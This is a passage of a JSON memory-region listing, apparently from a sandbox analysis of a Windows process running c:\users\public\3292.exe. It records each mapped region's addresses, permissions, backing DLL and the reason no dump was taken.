"norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:08.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1788", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:08.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_1789", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:08.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 606207, "entry_point": 0, "filename": null, "id": "region_1790", "name": "pagefile_0x0000000000090000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 589824, "timestamp": "00:01:08.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 663551, "entry_point": 0, "filename": null, "id": "region_1791", "name": "pagefile_0x00000000000a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 655360, "timestamp": "00:01:08.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_1792", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:08.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 372736, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4567039, "entry_point": 0, "filename": null, "id": "region_1793", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:08.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 12451840, "type": "region", "version": 1 }, "end_va": 12578815, "entry_point": 12458144, "filename": "\\Users\\Public\\3292.exe", "id": "region_1794", "name": "3292.exe", "norm_filename": "c:\\users\\public\\3292.exe", "region_type": "memory_mapped_file", "start_va": 12451840, "timestamp": "00:01:08.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1795", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:08.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1796", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:01:08.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1797", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:08.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1798", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:08.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1799", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:08.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1800", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:08.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1801", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:08.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1802", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:08.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1803", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:08.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 7012351, "entry_point": 0, "filename": null, "id": "region_1816", "name": "private_0x0000000000630000", "norm_filename": null, "region_type": "private_memory", "start_va": 6488064, "timestamp": "00:01:08.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953366016, "type": "region", "version": 1 }, "end_va": 1953398783, "entry_point": 1953374456, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1817", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953366016, "timestamp": "00:01:08.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953808383, "entry_point": 1953691544, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1818", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:01:08.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1954082815, "entry_point": 1954012792, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1819", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:01:08.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1820", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1142783, "entry_point": 720896, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1821", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 720896, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 9961471, "entry_point": 0, "filename": null, "id": "region_1822", "name": "private_0x0000000000880000", "norm_filename": null, "region_type": "private_memory", "start_va": 8912896, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965388920, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1823", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973433043, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1824", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_1825", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:01:08.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_1826", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:01:08.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1827", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:08.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1828", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:08.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 0, "filename": null, "id": "region_1829", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:01:08.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1947598848, "type": "region", "version": 1 }, "end_va": 1947635711, "entry_point": 1947598848, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_1830", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1947598848, "timestamp": "00:01:08.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1949237248, "type": "region", "version": 1 }, "end_va": 1950932991, "entry_point": 1949427381, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1831", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1949237248, "timestamp": "00:01:08.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960579297, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1832", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:01:08.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960747955, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1833", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:01:08.651", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961445749, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1834", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:01:08.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1961623552, "type": "region", "version": 1 }, "end_va": 1963700223, "entry_point": 1961632473, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_1835", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1961623552, "timestamp": "00:01:08.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1963769855, "entry_point": 1963729806, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_1836", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:01:08.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963891622, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1837", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:01:08.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964270403, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1838", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:01:08.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965728882, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1839", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:01:08.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1967411199, "entry_point": 1966413925, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_1840", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:01:08.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967766077, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1841", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:01:08.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1969110999, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1842", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:08.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970227685, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1843", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:01:08.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970812576, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1844", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:08.657", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970976493, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1845", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:01:08.657", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1973342207, "entry_point": 1972180362, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_1846", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:01:08.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 503808, "start_va": 1975320576, "type": "region", "version": 1 }, "end_va": 1975824383, "entry_point": 1975320576, "filename": "\\Windows\\SysWOW64\\comdlg32.dll", "id": "region_1847", "name": "comdlg32.dll", "norm_filename": "c:\\windows\\syswow64\\comdlg32.dll", "region_type": "memory_mapped_file", "start_va": 1975320576, "timestamp": "00:01:08.659", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1975844864, "type": "region", "version": 1 }, "end_va": 1988730879, "entry_point": 1976374785, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1848", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1975844864, "timestamp": "00:01:08.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991639040, "type": "region", "version": 1 }, "end_va": 1992224767, "entry_point": 1991655345, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1849", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991639040, "timestamp": "00:01:08.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1992556544, "type": "region", "version": 1 }, "end_va": 1993826303, "entry_point": 1992563509, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_1850", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1992556544, "timestamp": "00:01:08.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993934185, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1851", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:01:08.672", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 6193151, "entry_point": 0, "filename": null, "id": "region_1873", "name": "pagefile_0x0000000000460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4587520, "timestamp": "00:01:08.737", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961104783, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1874", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:01:08.737", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974474379, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1875", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:01:08.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1920", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:08.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1921", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:08.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1253375, "entry_point": 0, "filename": null, "id": "region_1922", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:08.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 8589311, "entry_point": 0, "filename": null, "id": "region_1923", "name": "pagefile_0x00000000006b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7012352, "timestamp": "00:01:08.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1924", "name": "pagefile_0x0000000000c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12582912, "timestamp": 